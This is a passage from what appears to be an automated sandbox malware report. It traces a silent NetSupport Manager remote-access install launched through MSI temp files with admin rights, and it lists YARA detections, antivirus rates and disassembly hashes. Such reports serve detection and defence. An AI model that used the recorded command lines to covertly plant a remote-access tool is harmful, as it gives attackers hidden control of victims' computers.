                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000001C.00000000.2534398483.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000001C.00000000.2534438501.0000000000B87000.00000008.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSI264F.tmp, Author: Joe Security
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:29
                                                                                                                      Start time:20:38:27
                                                                                                                      Start date:22/11/2024
                                                                                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 6881B33184DF9141E848EAD78A411E72 E Global\MSI0000
                                                                                                                      Imagebase:0x6a0000
                                                                                                                      File size:59'904 bytes
                                                                                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:30
                                                                                                                      Start time:20:38:27
                                                                                                                      Start date:22/11/2024
                                                                                                                      Path:C:\Windows\Installer\MSI2BE4.tmp
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Windows\Installer\MSI2BE4.tmp" /G"C:\Program Files (x86)\NetSupport\NetSupport Manager\" /EU
                                                                                                                      Imagebase:0x450000
                                                                                                                      File size:763'872 bytes
                                                                                                                      MD5 hash:0FCF65C63E08E77732224B2D5D959F13
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000001E.00000002.2554269183.00000000004F7000.00000004.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000001E.00000000.2548654979.00000000004D9000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000001E.00000002.2554229748.00000000004D9000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000001E.00000000.2548694206.00000000004F7000.00000008.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSI2BE4.tmp, Author: Joe Security
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:31
                                                                                                                      Start time:20:38:32
                                                                                                                      Start date:22/11/2024
                                                                                                                      Path:C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exe"
                                                                                                                      Imagebase:0xe70000
                                                                                                                      File size:551'904 bytes
                                                                                                                      MD5 hash:FE7D9DC26FF1615C13722E0F2DD3B815
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000001F.00000000.2597333722.0000000000EEA000.00000008.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000001F.00000002.2598454747.0000000000EEA000.00000004.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000001F.00000000.2597293331.0000000000EDB000.00000002.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000001F.00000002.2598416360.0000000000EDB000.00000002.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exe, Author: Joe Security
                                                                                                                      Antivirus matches:
                                                                                                                      • Detection: 3%, ReversingLabs
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:32
                                                                                                                      Start time:20:38:32
                                                                                                                      Start date:22/11/2024
                                                                                                                      Path:C:\Windows\Installer\MSI3FCC.tmp
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Windows\Installer\MSI3FCC.tmp" /G"C:\Program Files (x86)\NetSupport\NetSupport Manager\" /EV"NetSupport School" /EF".\Log Files" /EF".\Bookmarks" /EF".\Tests" /EF".\Store" /EF".\inv" /EF".\Resources" /EF".\Help" /EF".\Image" /EF".\Sound" /EF".\Video" /EA /EX /EC /Q /V /Q /I *
                                                                                                                      Imagebase:0x170000
                                                                                                                      File size:763'872 bytes
                                                                                                                      MD5 hash:0FCF65C63E08E77732224B2D5D959F13
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000020.00000000.2599536799.0000000000217000.00000008.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000020.00000002.2628823343.00000000001F9000.00000002.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000020.00000002.2628908361.0000000000217000.00000004.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000020.00000000.2599496607.00000000001F9000.00000002.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSI3FCC.tmp, Author: Joe Security
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:33
                                                                                                                      Start time:20:38:34
                                                                                                                      Start date:22/11/2024
                                                                                                                      Path:C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:winst64.exe /q /q /ex /i
                                                                                                                      Imagebase:0x7ff778ee0000
                                                                                                                      File size:345'056 bytes
                                                                                                                      MD5 hash:96E987D909600D34DD70C55F56EB8869
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000021.00000002.2615349349.0000000000B38000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000021.00000000.2613624042.00007FF778F16000.00000002.00000001.01000000.0000000F.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000021.00000002.2615985301.00007FF778F16000.00000002.00000001.01000000.0000000F.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exe, Author: Joe Security
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:34
                                                                                                                      Start time:20:38:37
                                                                                                                      Start date:22/11/2024
                                                                                                                      Path:C:\Windows\Installer\MSI51C1.tmp
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Windows\Installer\MSI51C1.tmp" /G"C:\Program Files (x86)\NetSupport\NetSupport Manager\" /EI
                                                                                                                      Imagebase:0xd40000
                                                                                                                      File size:763'872 bytes
                                                                                                                      MD5 hash:0FCF65C63E08E77732224B2D5D959F13
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000022.00000002.2658298152.0000000000DE7000.00000004.00000001.01000000.00000013.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000022.00000002.2658247472.0000000000DC9000.00000002.00000001.01000000.00000013.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000022.00000000.2645382897.0000000000DC9000.00000002.00000001.01000000.00000013.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000022.00000000.2645414113.0000000000DE7000.00000008.00000001.01000000.00000013.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSI51C1.tmp, Author: Joe Security
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:35
                                                                                                                      Start time:20:38:37
                                                                                                                      Start date:22/11/2024
                                                                                                                      Path:C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe" /* *
                                                                                                                      Imagebase:0x730000
                                                                                                                      File size:120'288 bytes
                                                                                                                      MD5 hash:297EA82401ACBEAD6BA4B19880DF2B8C
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000023.00000003.2650049408.0000000000968000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000023.00000003.2650414598.0000000000954000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000023.00000003.2650546737.0000000000968000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000023.00000000.2645950640.0000000000732000.00000002.00000001.01000000.00000014.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe, Author: Joe Security
                                                                                                                      Antivirus matches:
                                                                                                                      • Detection: 12%, ReversingLabs
                                                                                                                      Has exited:false

                                                                                                                      General

                                                                                                                      Target ID:36
                                                                                                                      Start time:20:38:38
                                                                                                                      Start date:22/11/2024
                                                                                                                      Path:C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe" /Q "C:\Program Files (x86)\NetSupport\NetSupport Manager\Client32.ini"
                                                                                                                      Imagebase:0xd40000
                                                                                                                      File size:120'288 bytes
                                                                                                                      MD5 hash:B8ACD5C9E200166C6B4E5001AEEEAF20
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000024.00000000.2661196429.0000000000D42000.00000002.00000001.01000000.0000001E.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000024.00000002.2673004138.0000000000D42000.00000002.00000001.01000000.0000001E.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000024.00000002.2676144643.000000006A868000.00000002.00000001.01000000.0000001F.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000024.00000002.2672514031.0000000000845000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe, Author: Joe Security
                                                                                                                      Antivirus matches:
                                                                                                                      • Detection: 3%, ReversingLabs
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:37
                                                                                                                      Start time:20:38:39
                                                                                                                      Start date:22/11/2024
                                                                                                                      Path:C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe"
                                                                                                                      Imagebase:0xd40000
                                                                                                                      File size:120'288 bytes
                                                                                                                      MD5 hash:B8ACD5C9E200166C6B4E5001AEEEAF20
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000025.00000002.2666174324.0000000000D42000.00000002.00000001.01000000.0000001E.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000025.00000000.2665153542.0000000000D42000.00000002.00000001.01000000.0000001E.sdmp, Author: Joe Security
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:38
                                                                                                                      Start time:20:38:39
                                                                                                                      Start date:22/11/2024
                                                                                                                      Path:C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe" * /VistaUI
                                                                                                                      Imagebase:0x730000
                                                                                                                      File size:120'288 bytes
                                                                                                                      MD5 hash:297EA82401ACBEAD6BA4B19880DF2B8C
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000026.00000003.2696801013.000000000769D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000026.00000002.2707856987.0000000004E5C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000026.00000003.2695230084.0000000007690000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000026.00000003.2695127199.000000000768A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000026.00000003.2695492759.00000000076B7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000026.00000003.2694988541.0000000007684000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000026.00000003.2695369068.000000000769B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000026.00000002.2715522100.000000006BE3D000.00000004.00000001.01000000.00000015.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000026.00000002.2715380092.000000006BDC6000.00000002.00000001.01000000.00000015.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000026.00000002.2714100665.0000000069E8B000.00000002.00000001.01000000.00000024.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000026.00000003.2695300634.0000000007696000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000026.00000000.2666385181.0000000000732000.00000002.00000001.01000000.00000014.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000026.00000002.2714876626.000000006A0B0000.00000002.00000001.01000000.00000023.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000026.00000002.2702240534.0000000000732000.00000002.00000001.01000000.00000014.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000026.00000002.2707997858.0000000004E71000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000026.00000002.2707856987.0000000004E62000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000026.00000002.2711304363.0000000007236000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:40
                                                                                                                      Start time:20:38:45
                                                                                                                      Start date:22/11/2024
                                                                                                                      Path:C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe" * /VistaUI
                                                                                                                      Imagebase:0x7ff71e800000
                                                                                                                      File size:120'288 bytes
                                                                                                                      MD5 hash:297EA82401ACBEAD6BA4B19880DF2B8C
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000028.00000000.2728490909.0000000000732000.00000002.00000001.01000000.00000014.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000028.00000002.2769152495.000000006C860000.00000002.00000001.01000000.00000023.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000028.00000002.2767435656.000000006BDC6000.00000002.00000001.01000000.00000015.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000028.00000002.2770240444.000000006F8EB000.00000002.00000001.01000000.00000024.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000028.00000002.2757688060.0000000000732000.00000002.00000001.01000000.00000014.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000028.00000002.2767496794.000000006BE3D000.00000004.00000001.01000000.00000015.sdmp, Author: Joe Security
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:41
                                                                                                                      Start time:20:38:47
                                                                                                                      Start date:22/11/2024
                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                      Imagebase:0x7ff6eef20000
                                                                                                                      File size:55'320 bytes
                                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:false

                                                                                                                      General

                                                                                                                      Target ID:42
                                                                                                                      Start time:20:38:47
                                                                                                                      Start date:22/11/2024
                                                                                                                      Path:C:\Windows\SysWOW64\cscript.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"cscript.exe" C:\Windows\system32\Printing_Admin_Scripts\en-US\prnport.vbs -a -r NSM001 -h 127.0.0.1 -o raw -n 49850
                                                                                                                      Imagebase:0x940000
                                                                                                                      File size:144'896 bytes
                                                                                                                      MD5 hash:CB601B41D4C8074BE8A84AED564A94DC
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:43
                                                                                                                      Start time:20:38:47
                                                                                                                      Start date:22/11/2024
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                      File size:862'208 bytes
                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:44
                                                                                                                      Start time:20:38:47
                                                                                                                      Start date:22/11/2024
                                                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4296 -ip 4296
                                                                                                                      Imagebase:0xaf0000
                                                                                                                      File size:483'680 bytes
                                                                                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:45
                                                                                                                      Start time:20:38:50
                                                                                                                      Start date:22/11/2024
                                                                                                                      Path:C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe" * /VistaUI
                                                                                                                      Imagebase:0x730000
                                                                                                                      File size:120'288 bytes
                                                                                                                      MD5 hash:297EA82401ACBEAD6BA4B19880DF2B8C
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000002D.00000000.2778639496.0000000000732000.00000002.00000001.01000000.00000014.sdmp, Author: Joe Security
                                                                                                                      Has exited:false

                                                                                                                      General

                                                                                                                      Target ID:46
                                                                                                                      Start time:20:38:52
                                                                                                                      Start date:22/11/2024
                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p -s TapiSrv
                                                                                                                      Imagebase:0x7ff6eef20000
                                                                                                                      File size:55'320 bytes
                                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:false

                                                                                                                      Disassembly

                                                                                                                      Reset < >

                                                                                                                        Executed Functions

                                                                                                                        Function 0B8DF588 Relevance: 1.5, Strings: 1, Instructions: 276COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.1881900138.000000000B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8C0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_b8c0000_Pyyidau.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: Deq
                                                                                                                        • API String ID: 0-948982800
                                                                                                                        • Opcode ID: 28c95453578fd7eeef69e46e961823f4ab3b37886f08539fc86231870537b608
                                                                                                                        • Instruction ID: 26171c969e0d0513f116da5e0ceb0d1fab5bfa2191e643d13b40f6c31fa3f36a
                                                                                                                        • Opcode Fuzzy Hash: 28c95453578fd7eeef69e46e961823f4ab3b37886f08539fc86231870537b608
                                                                                                                        • Instruction Fuzzy Hash: 94D1C274E00218CFDB54CFA9D994A9DBBB2FF88300F1081AAD509AB365DB34AD85CF51
                                                                                                                        Function 072A00F0 Relevance: 15.6, Strings: 12, Instructions: 562COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.1832849722.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_72a0000_Pyyidau.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$`Bak$$^q$$^q$$^q
                                                                                                                        • API String ID: 0-1909234382
                                                                                                                        • Opcode ID: e119d7a5d435c76d3c0272154023a231ce6c9512f88b0a99f6f3c1c3797ce68a
                                                                                                                        • Instruction ID: ff0ba8ccd0a0b05f38a2db6ddea9dc899dc0c0dc46dacc5c8548db165e480ae4
                                                                                                                        • Opcode Fuzzy Hash: e119d7a5d435c76d3c0272154023a231ce6c9512f88b0a99f6f3c1c3797ce68a
                                                                                                                        • Instruction Fuzzy Hash: 77023BB1B25316AFCB358B7998006BABBE1AFC5314F14847BD405CB251FA72C985CB92
                                                                                                                        Function 072A1425 Relevance: 6.4, Strings: 5, Instructions: 185COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.1832849722.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_72a0000_Pyyidau.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: Te^q$XX^q$XX^q$XX^q$XX^q
                                                                                                                        • API String ID: 0-2757156080
                                                                                                                        • Opcode ID: 7b39af3fa749a94a6c4b0135c93b61537534e90f46916ef39adb9b0e0e00173d
                                                                                                                        • Instruction ID: 48ab92348961a196d39034e5c5872c1305fd7a722402ff830f824fa96364c55d
                                                                                                                        • Opcode Fuzzy Hash: 7b39af3fa749a94a6c4b0135c93b61537534e90f46916ef39adb9b0e0e00173d
                                                                                                                        • Instruction Fuzzy Hash: FF5146B073020BAFCF156A39855167A7BF3AF81320F28842AD512CF291EF76D856C761
                                                                                                                        Function 072A0D15 Relevance: 6.4, Strings: 5, Instructions: 123COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.1832849722.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_72a0000_Pyyidau.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                                                                                        • API String ID: 0-3272787073
                                                                                                                        • Opcode ID: eea88cd6c55b7a1ead7cab9ef149b288b7e1c2e84169555593f0cbbc78d9112b
                                                                                                                        • Instruction ID: 0be928178a2947005fec09fa9b43f9ed240a95054e9955bf9579a8c12bf3bf53
                                                                                                                        • Opcode Fuzzy Hash: eea88cd6c55b7a1ead7cab9ef149b288b7e1c2e84169555593f0cbbc78d9112b
                                                                                                                        • Instruction Fuzzy Hash: A2316CB677024FAFDB391A609A1067AB792DF91300F10446EC8118E296FF72D485C762
